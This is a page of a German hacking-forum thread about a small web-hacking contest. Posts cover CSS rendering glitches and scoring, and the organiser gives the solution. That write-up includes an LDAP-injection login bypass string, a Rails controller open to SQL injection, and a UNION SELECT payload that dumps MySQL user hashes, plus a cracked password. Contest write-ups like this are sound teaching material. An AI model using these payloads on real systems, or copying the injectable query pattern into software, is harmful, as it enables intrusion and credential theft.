Seite 2 von 2 ErsteErste 12
Ergebnis 16 bis 27 von 27

Thema: [DugJC] - 03 - April, April

  1. #16
    Administrator
    Registriert seit
    Nov 2002
    Beiträge
    89
    Renommee
    186

    Re: [DugJC] - 03 - April, April

    By default, Rails appends asset’s timestamps to all asset paths. This allows you to set a cache-expiration date for the asset far into the future, but still be able to instantly invalidate it by simply updating the file (and hence updating the timestamp, which then updates the URL as the timestamp is part of that, which in turn busts the cache).
    Zu den Flecken: Hat vielleicht etwas damit zu tun, dass dein Browser das CSS zerhaut oder mit HTML5 nicht klar kommt? Konnte sie auf jeden Fall nicht rekonstruieren.

    Was exor sagen moechte verstehe ich gerade nicht.
    ugly and proud

  2. #17
    Registered User
    Registriert seit
    May 2005
    Beiträge
    92
    Renommee
    61

    Re: [DugJC] - 03 - April, April

    Die weißen Flecken sind wirklich nur, weil der Browser das CSS verhaut. Tut er bei mir auch (Firefox 3.6.14), aber im Firefox 4 sieht alles toll aus.

    Allerdings hat das zerhauene CSS einen kleinen Vorteil ganz am Anfang gehabt

    Weitere verstecke Hinweise habe ich noch nicht entdeckt. Oder ich verrate sie nicht
    7 Bier sind auch ein Schnitzel, aber dann hat man noch nichts getrunken

    www.smikey.de

  3. #18
    Moderator
    Nothing is unbreakable!

    Registriert seit
    Jul 2003
    Beiträge
    622
    Renommee
    819

    Re: [DugJC] - 03 - April, April

    Zitat Zitat von maloi Beitrag anzeigen
    Dieser Tipp gilt natuerlich nur wenn es ein solches Formular gibt.
    o.0 Du hast Recht, es exisierte nicht und nun ist es da. Zauberrei! Dabei wollte ich doch nur das mit den weißen Flecken überprüfen. Aber stimmt, liegt am Browser

  4. #19
    Registered User
    Registriert seit
    Mar 2001
    Beiträge
    655
    Renommee
    287

    Re: [DugJC] - 03 - April, April

    uaah, das hat ja schon mal einer gepostet...
    Geändert von dexcs (11.04.2011 um 15:13 Uhr) Grund: Gleiche Erklärung wie oben :-)
    Wenns nicht an den Ohren liegt, liegts an der Materie dazwischen...

  5. #20
    Administrator
    Registriert seit
    Nov 2002
    Beiträge
    89
    Renommee
    186

    Re: [DugJC] - 03 - April, April

    I like rails routing!
    ugly and proud

  6. #21
    Administrator
    Registriert seit
    Nov 2002
    Beiträge
    89
    Renommee
    186

    Re: [DugJC] - 03 - April, April

    Einmal volle Punktzahl gibt es schon!
    ugly and proud

  7. #22
    Administrator
    Registriert seit
    Nov 2002
    Beiträge
    89
    Renommee
    186

    Re: [DugJC] - 03 - April, April

    Es koennen ab jetzt gerne Tipps per PN oder im IRC (#buha euirc.net) angefordert.
    Einfach kurz beschreiben wie weit ihr seid und ich werde den (hoffentlich) entscheidenden Tipp liefern.
    Für angeforderte Tipps wird es einen Punktabzug geben, aber es wird sich immer noch lohnen!
    ugly and proud

  8. #23
    Administrator
    Registriert seit
    Nov 2002
    Beiträge
    89
    Renommee
    186

    Re: [DugJC] - 03 - April, April

    Hallo,

    der Contest ist ja leider schon rum.
    Leider hat es nur einer geschafft.
    Glückwunsch an nle!

    Hier mal die Punkteverteilung:

    User Punkte
    -----------------------
    nle-----------10
    elise----------5
    rec------------5
    retak---------5
    dexcs---------5
    Smikey-------5
    xinorcimo-----5

    Loesung:
    ----------
    Das Login Formular war unter http://188.40.236.10:8080/signin zu finden.
    Dort konnte man per LDAP-Injection die Authentifizierung umgehen:
    Z.B. wie nle:
    Username: *)(&)
    Password: {beliebig}

    Danach war es an der Zeit sich um die Startseite zu kuemmern.
    Der verwundbare Code war:
    Code:
      # GET /entries/1/edit
      def edit
        @entry = Entry.find(:all, :conditions => "id = '#{params[:id]}'")
        @entry = @entry.last
      end
    Also wird die id direkt im SQL-Query verwendet -> SQL Injection.
    Hintereinanderausfuehrung von SQL Statements geht wie so oft nicht, also lesen wir eben wichtige Infos aus der DB. MySQL -> mysql.user.
    (Oder kann man da doch irgendwie etwas UPDATEN etc?)
    Code:
    http://188.40.236.10:8080/entries/2') UNION select 1, user, password, 4, 5 from mysql.user-- /edit
    Weitere Nutzer konnten mit einer WHERE-Klausel gefunden werden.

    Obiges Statement ergibt:
    user: buha
    password: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

    Mit Hilfe von google oder beliebigen anderen Seiten findet man heraus, dass der sich der Hash aus dem Password: 123456 bildet.

    Damit loggt man sich in die DB ein und aendert den Tip der Startseite oder treibt anderen Unfug!

    Ich waere für jede Kritik dankbar! War das Problem zu "akademisch"?

    Danke an alle, die teilgenommen haben!

    Gruesse
    ugly and proud

  9. #24
    Registered User
    Registriert seit
    Feb 2004
    Beiträge
    800
    Renommee
    756

    Re: [DugJC] - 03 - April, April

    nö, war nicht akademisch.

    denke, man hätte ein update reinbringen können, wenn einem der name der tips tabelle eingefallen wäre *g*

    hat spaß gemacht
    lg

  10. #25
    Registered User
    Registriert seit
    May 2005
    Beiträge
    92
    Renommee
    61

    Re: [DugJC] - 03 - April, April

    War ne tolle Challenge, habe mich seit langem nicht mehr so damit beschäftigt.

    Immerhin kam ich ja recht weit, nur die SQL-Injection hab ich dann nicht mehr hinbekommen, wobei ich ja auf dem richtigen Weg war. Aber ich versteh auch leider nicht den kompletten Query in der Injection, vorallem die 1, 4, 5 im Select-Statement. Aber naja 5 Punkte hab ich ja immerhin bekommen... Muahahaha.

    Danke für die Challenge, gerne mal wieder
    7 Bier sind auch ein Schnitzel, aber dann hat man noch nichts getrunken

    www.smikey.de

  11. #26
    Registered User
    Registriert seit
    Mar 2001
    Beiträge
    655
    Renommee
    287

    Re: [DugJC] - 03 - April, April

    uiui zum glück habe ich nicht weiter gemacht. Auf diesen SQl Inject währe ich im Leben net gekommen :-)
    Wenns nicht an den Ohren liegt, liegts an der Materie dazwischen...

  12. #27
    Administrator
    Registriert seit
    Jun 2001
    Beiträge
    1.332
    Renommee
    302

    Re: [DugJC] - 03 - April, April

    Zitat Zitat von elise Beitrag anzeigen
    ...denke, man hätte ein update reinbringen können, wenn einem der name der tips tabelle eingefallen wäre...
    Hatte genau das versucht, es wollte mir ums verrecken nicht gelingen. Den Umweg über die User-Tabelle von mysql habe ich dann aber auch nicht mehr hinbekommen... wobei ich mich die ganze Zeit gefragt habe, wozu mysqkd an das externe Interface gebunden war - naja das Alter. Spaß gemacht hats auf jeden Fall - ich hab auch alle Holzwege mitgenommen, die es mitzunehmen gab. LDAP war noch easy (zwar etwas anders als hier beschrieben, aber trotzdem erfolgreich ).

    @maloi: danke für alles

    Xinorcimo
    The economics of the future are somewhat different. Money doesn't exist in the 24th Century. The acquisition of wealth is no longer the driving force in our lives. We work to better ourselves and the rest of humanity.

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Ähnliche Themen

  1. Statistik Monat April
    Von blu im Forum Buha Board News
    Antworten: 0
    Letzter Beitrag: 01.05.2007, 07:11
  2. Statistik Monat April
    Von blu im Forum Buha Board News
    Antworten: 0
    Letzter Beitrag: 06.05.2006, 14:31

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •